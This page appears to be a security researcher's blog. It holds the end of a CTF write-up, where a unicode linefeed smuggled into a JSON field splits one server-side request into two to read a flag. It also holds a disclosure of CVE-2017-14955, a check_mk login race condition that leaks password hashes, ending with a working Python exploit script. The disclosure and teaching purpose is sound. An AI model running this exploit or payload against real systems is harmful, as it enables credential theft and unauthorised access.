The web application always returned an HTTP 404:

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3 (Ubuntu)</center>
</body>
</html>

This is simply due to the fact that the semicolon was interpreted by the webserver as part of the path itself. So if “;.com” did not exist on the remote server, the web server did always return an HTTP 404. To overcome this hurdle, a bit of creative thinking was required. Assuming that the flag file would be simply named “flag”, the following must be met in the end:

  1. The domain had to end with “.com”
  2. The URL-Splitting characters %, &, # and their (double-encoded) variants were not allowed

In the end the following request actually met all conditions:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 45

{"domain":"h1-212.rcesec.com:1337/flag\u000A.com"}

Here I was using a unicode-based linefeed-character to split up the domain name into two parts. This actually triggered two separate requests, which could be observed by the number being added to the read.php file and its “id” parameter. So when a single request without the linefeed character was issued:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 45

{"domain":"h1-212.rcesec.com:1337/flag;.com"}

the application returned the ID “0”:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 09:28:55 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

{"next":"\/read.php?id=0"}

However when the linefeed payload was issued:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 50

{"domain":"h1-212.rcesec.com:1337/flag\u000A.com"}

The read.php ID parameter was suddenly increased by two to “2” instead:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 09:30:08 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

{"next":"\/read.php?id=2"}

This indicated that the application actually accepted both “domains” leading to two different requests being sent. By querying the ID value minus 1 therefore returned the results from the call to “h1-212.rcesec.com:1337/flag”:

GET /read.php?id=1 HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes

Et voila:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 09:32:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html; charset=UTF-8

{"data":"RkxBRzogQ0YsMmRzVlwvXWZSQVlRLlRERXBgdyJNKCVtVTtwOSs5RkR7WjQ4WCpKdHR7JXZTKCRnN1xTKTpmJT1QW1lAbmthPTx0cWhuRjxhcT1LNTpCQ0BTYip7WyV6IitAeVBiL25mRm5hPGUkaHZ7cDhyMlt2TU1GNTJ5OnovRGg7ezYK"}

When the “data” value is base64-decoded, it finally revealed the flag:

FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(\%mU;p9+9FD{Z48X*Jtt{\%vS($g7\S):f\%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6

Challenge completed.

CVE-2017-14955: Win a Race Against Check_mk to Dump All Your Login Data

18 October 2017 at 00:00

The authors of check_mk have fixed a quite interesting vulnerability, which I have recently reported to them, called CVE-2017-14955 (sorry no fancy name here) affecting the oldstable version 1.2.8p25 and below of both check_mk and check_mk Enterprise. It’s basically about a Race Condition vulnerability affecting the login functionality, which in the end leads to the disclosure of authentication credentials to an unauthenticated user. Sounds like a bit of fun, doesn’t it? Let’s dig into it ;-)

How to win a race

You might have seen this login interface before:

While trying to brute force the authentication of check_mk with multiple concurrent threads using the following request:

POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1

---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"

login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"

index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"

omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"

welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

Login
---9519178121294961341040589727--

A really interesting “No such file or directory” is thrown randomly and completely unreliably, which looks like the following:

<td class="left">Exception</td><td><pre>OSError ([Errno 2] No such file or directory)</pre></td></tr><tr class="data even0"><td class="left">Traceback</td><td><pre>  File &quot;/check_mk/web/htdocs/index.py&quot;, line 95, in handler
    login.page_login(plain_error())

  File &quot;/check_mk/web/htdocs/login.py&quot;, line 261, in page_login
    result = do_login()

  File &quot;/check_mk/web/htdocs/login.py&quot;, line 254, in do_login
    userdb.on_failed_login(username)

  File &quot;/check_mk/web/htdocs/userdb.py&quot;, line 273, in on_failed_login
    save_users(users)

  File &quot;/check_mk/web/htdocs/userdb.py&quot;, line 582, in save_users
    os.rename(filename, filename[:-4])
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
                              'contactgroups': ['all'],
                              'disable_notifications': False,
                              'email': u'[email protected]',
                              'enforce_pw_change': False,
                              'last_pw_change': 0,
                              'last_seen': 0.0,
                              'locked': False,
                              'num_failed': 0,
                              'pager': '',
                              'password': '$1$400000$13371337asdfasdf',
                              'roles': ['admin'],
                              'serial': 2},
[...]

I guess you find this as interesting as I did, because this Python exception basically contains a copy of all added users including their email addresses, roles, and even their encrypted password.

Triaging

Sometimes I’m really curious about the root cause of some vulnerabilities just like in this specific case. What makes this vulnerability so interesting is the fact that the vulnerability can be triggered by just knowing one valid username, which is usually “omdadmin”.

So as soon as a login fails, the function “on_failed_login()” from /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py is triggered (lines 261-273):

def on_failed_login(username):
    users = load_users(lock = True)
    if username in users:
        if "num_failed" in users[username]:
            users[username]["num_failed"] += 1
        else:
            users[username]["num_failed"] = 1

        if config.lock_on_logon_failures:
            if users[username]["num_failed"] >= config.lock_on_logon_failures:
                users[username]["locked"] = True

        save_users(users)

This function basically stores the number of failed login attempts for a valid user and in the end calls another function named “save_users()” with the number of failed login attempts as an argument. When tracing further through the save_users(), you’ll finally come across the vulnerable code part (lines 575-582):

    
# Users with passwords for Multisite
    filename = multisite_dir + "users.mk.new"
    make_nagios_directory(multisite_dir)
    out = create_user_file(filename, "w")
    out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
    out.write("multisite_users = \\n%s\n" % pprint.pformat(users))
    out.close()
    os.rename(filename, filename[:-4])

But the vulnerability doesn’t look quite obvious, right? Well it’s basically about a race condition - if you’re not familiar with Race Conditions, just imagine the following situation applied to that code snippet:

  1. When brute-forcing, you usually use multiple, concurrent threads, because otherwise it would take too long.
  2. All of these threads will go through the same instruction set, which means they will call the save_users() function at nearly the same time - depending a bit on the connection delay between the client and the server.
  3. For simplicity let’s imagine, two of these threads are only a tenth of a millisecond away from each other, so “delayed” by just one instruction (in terms of the script shown above).
  4. The first thread passes all instructions and thereby creates a new “users.mk.new” file (line 2), until it reaches the os.rename call (line 8), but has not yet processed the os.rename call.
  5. The second thread, does the very same, but with the mentioned small delay: it passes all instructions including up to line 7, which means it has just closed the “users.mk.new” file and is now about to call the os.rename function as well.
  6. Since the first thread is a bit ahead of time, it is the first to processes the os.rename function call and thereby renames the “users.mk.new” file to “users.mk”.
  7. The second thread now tries to do the very same thing, however the “users.mk.new” file was just renamed by the first thread, which however means that “its own” os.rename call still tries to rename the “users.mk.new” file, which was apparently just renamed by the first thread.
  8. Since there is no exception handling built around this instruction set, the Python script fails since the second thread cannot find the file to rename and finally throws the stack trace from above leaking all the credential details.

A few more things that come into play here:

First: the create_user_file() function doesn’t really play an important role here, since it’s sole purpose is to create a new File object. So if the file passed to it via its “path” argument does already exist in the file-system, it will not throw an exception at all.

def create_user_file(path, mode):
    path = make_utf8(path)
    f = file(path, mode, 0)
    gid = grp.getgrnam(defaults.www_group).gr_gid
    # Tackle user problem: If the file is owned by nagios, the web
    # user can write it but cannot chown the group. In that case we
    # assume that the group is correct and ignore the error
    try:
        os.chown(path, -1, gid)
        os.chmod(path, 0660)
    except:
        pass
    return f

Second: More interestingly, the application is shipped with an own crash reporting system (see packages/check_mk/check_mk-1.2.8p25/web/htdocs/crash_reporting.py), which prints out all local variables including these very sensitive ones:

def show_crash_report(info):
    html.write("<h2>%s</h2>" % _("Crash Report"))
    html.write("<table class=\"data\">")
    html.write("<tr class=\"data even0\"><td class=\"left legend\">%s</td>" % _("Crash Type"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["crash_type"]))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Time"))
    html.write("<td>%s</td></tr>" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(info["time"])))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Operating System"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["os"]))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Check_MK Version"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["version"]))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Python Version"))
    html.write("<td>%s</td></tr>" % html.attrencode(info.get("python_version", _("Unknown"))))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Exception"))
    html.write("<td><pre>%s (%s)</pre></td></tr>" % (html.attrencode(info["exc_type"]),
                                                     html.attrencode(info["exc_value"])))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Traceback"))
    html.write("<td><pre>%s</pre></td></tr>" % html.attrencode(format_traceback(info["exc_traceback"])))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Local Variables"))
    html.write("<td><pre>%s</pre></td></tr>" % html.attrencode(format_local_vars(info["local_vars"])))
    html.write("</table>")

Third: There is also another vulnerable instruction set right before the first one at /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py - lines 567 to 573, with exactly the same issue:

    
# Check_MK's monitoring contacts
    filename = root_dir + "contacts.mk.new"
    out = create_user_file(filename, "w")
    out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
    out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
    out.close()
    os.rename(filename, filename[:-4])

About the Vendor Response

Just one word: amazing! I have reported this vulnerability on 2017-09-21, which was a Thursday, and they’ve already pushed a fix to their git on Tuesday 2017-09-25 and at the same time published a new version 1.2.8p26 which contains the official fix. Really commendable work check_mk team!

Exploit time!

An exploit script will be disclosed soon over at Exploit-DB, in the meanwhile, take it from here:

#!/usr/bin/python
# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition
# Version:       <= 1.2.8p25
# Date:          2017-10-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on:     1.2.8p25
# CVE:		 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955\. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

try:
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
	pass

# Config Me
target_url = "https://localhost/check_mk/login.py"
target_username = "omdadmin"

proxies = {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

def make_session():
	v = requests.post(target_url, verify=False, proxies=proxies, files={'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (None, 'index.py'), '_username': (None, target_username), '_password': (None, 'random'), '_login': (None, 'Login')})
	return v.content

NUM = 50

threads = []
for i in range(NUM):
    t = threading.Thread(target=make_session)
    threads.append(t)
    t.start()
❌
❌